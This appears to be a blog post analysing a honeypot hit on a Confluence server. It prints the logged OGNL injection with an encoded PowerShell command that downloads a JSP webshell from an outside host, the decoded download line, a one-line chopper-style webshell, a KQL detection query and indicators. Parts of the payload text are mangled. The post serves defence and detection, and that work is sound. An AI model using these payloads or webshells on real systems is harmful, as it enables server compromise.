Threat Intel

When running honeypots you never have to wait too long for something to drop!

This moring we had a new hit in the pot, so I decided to invesigate but also to blog and show how we could go about investigating the logs and paylods etc.

[08/Jun/2022:07:00:36  0100] - http-nio-8090-exec-7 212.30.60[.]161 GET /login.action HTTP/1.1 200 47ms 7126 - python-requests/2.27.1
[08/Jun/2022:07:00:39  0100] - http-nio-8090-exec-8 212.30.60[.]161 GET /${(#[email protected]@toString(@[email protected]().exec("cmd.exe /c powershell.exe -exec Bypass -noP -enco KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwB0AG8AcgBmAHUAbgAzAC4AZABlAC8AaQBuAGMAbAB1AGQAZQBzAC8AYQBkAGQAbwBuAHMALwBlAHIAcgBvAHIALgByAGEAcgAnACwAIAAnAC4ALwBjAG8AbgBmAGwAdQBlAG4AYwBlAC8AZQByAHIAbwByAC4AagBzAHAAJwApAA==").getInputStream(),"utf-8")).(@[email protected]().setHeader("X-Cmd-Response",#a))}/ HTTP/1.1 302 595ms - - python-requests/2.27.1

This creates a webshell backdoor named error.jsp

Read more: Learn to SOC: Java Webshell via confluence

As from the above confluence access logs this decodes to:


which results in (de-fanged)

(New-Object System.Net.WebClient).DownloadFile('http://www.motorfun3[.]de/includes/addons/error.rar', './confluence/error.jsp')

which drops error.jsp into the confluence web root.

error.jsp java webshell

This webshell has a range of functions:

upload and execute features of webshell
Launch command via webshell

now i’ve just run whoami

We can see here the context of the service is “nt authority\network service”

We also can confirm that this execution is detected in MDE:

MDE detects webshell launching whoami

Detection in MDE

The following KQL query will find the webshell being dropped:

| where FileName has ".jsp"
| sort by Timestamp desc 

I’ve left that wide on purpose feel free to tune that!

detection in MDE DeviceFileEvents


It appears to have originated here:

You can see this online on github:

I also found another chopper style shell from another actor located here:


<% if(request.getParameter("f")!=null)(new"f"))).write(request.getParameter("t").getBytes()); %>


Threat Actor IP:

error.jsp webshell shah256: 9EDB929C10532EE626BE9B25461DD7F0FD7DA780EB19E919E85F2A02B92E22FC

suspected compromised site: www.motorfun3[.]de

webshell download url: ‘http://www.motorfun3[.]de/includes/addons/error.rar’